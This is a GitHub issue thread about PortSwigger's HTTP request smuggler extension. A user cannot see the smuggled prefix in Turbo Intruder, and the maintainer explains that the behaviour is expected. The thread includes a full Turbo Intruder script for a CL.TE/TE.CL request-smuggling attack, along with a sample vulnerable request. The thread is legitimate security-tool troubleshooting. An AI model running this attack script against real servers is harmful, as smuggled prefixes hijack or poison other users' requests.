### ISSUE TITLE
Prefix not showing in Turbo Intruder

### ISSUE THREAD

**Issue by phspade** [PortSwigger/http-request-smuggler#25]
If Burp Pro detects HTTP Smuggle Vulnerability you can launch a Smuggle Attack (CL.TE) or (TE.CL) launching Smuggle attack from Turbo Intruder should lead you to this Configuration.

```
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
import re

def queueRequests(target, wordlists):

    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )
    engine.start()

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''POST /hopefully404 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1'''

    chunk_size = hex(len(prefix)).lstrip("0x")
    attack = target.req.replace('0\r\n\r\nX', chunk_size+'\r\n'+prefix+'\r\n0\r\n\r\n')
    content_length = re.search('Content-Length: ([\d]+)', attack).group(1)
    attack = attack.replace('Content-Length: '+content_length, 'Content-length: '+str(int(content_length)+len(chunk_size)-3))
    engine.queue(attack)

    for i in range(14):
        engine.queue(target.req)
        time.sleep(0.05)


def handleResponse(req, interesting):
    table.add(req)
```

Vulnerable Request:

```
POST / HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

X
```

Screenshot:
![smuggler](https://user-images.githubusercontent.com/18681023/68067339-698cff00-fd80-11e9-998e-d35510409880.png)

In Result, I cannot see the payload or the prefix in my request in turbo intruder requests. It just like repeating the request without the payloads. I don't know if there is something wrong in my end or in my configuration. let me hear it from @albinowax

**Comment by albinowax** [comment]
Thanks for reporting this. I think the root cause is probably that you've picked TE.CL when the request is using a CL.TE based attack. However, I'll see if there's a way to programatically prevent this problem.

**Comment by albinowax** [comment]
I can't replicate this behaviour. The screenshot you've provided shows expected behaviour - all of the requests will be equal to the base request, except for one. Could you take a look through the other attacks and see if they're all identical, or one of them actually contains the attack?

**Comment by phspade** [comment]
Hi @albinowax 
Sorry for my late late reply. I'm looking for some smuggling vulnerability but I still don't know if my burp extension has a problem or I'm not doing it right. Please check my screenshot.

As you can see it's a CL.TE
![test2](https://user-images.githubusercontent.com/18681023/69348900-de819380-0cb1-11ea-8a63-7af07aa257f5.png)

I clicked Smuggle (CL.TE)
![http_smuggle](https://user-images.githubusercontent.com/18681023/69348897-dde8fd00-0cb1-11ea-8672-d4ee995eae81.png)

As you can see here the prefix parameter is present and its properly set for the vulnerable request
![http_smuggle2](https://user-images.githubusercontent.com/18681023/69348896-dde8fd00-0cb1-11ea-992a-e9744b332977.png)

Upon launching the attack. I cannot see the payloads which is in prefix parameter.
![http_smuggle3](https://user-images.githubusercontent.com/18681023/69348892-dd506680-0cb1-11ea-8b1b-a542e7502183.png)

**Comment by albinowax** [comment]
The payload should be in one of the 15 requests displayed - have you checked them all?

**Comment by phspade** [comment]
Hi @albinowax 

I can confirm that the payload is one of the 15 requests. One thing I noticed that the Content-Length Header is updating the request payload. I can reproduce the Vulnerability in repeater because I turned off the `Update Content-Length` Option. However, while using the HTTP Smuggling attack in Turbo Intruder. The content-length is updating.

**Comment by albinowax** [comment]
When you're doing a CL.TE attack, the content-length should be updated so the behaviour here is correct. If you select a TE.CL attack the content-length header will be renamed to Content-length which prevents Turbo from updating it.

So, sounds like there's no issues.
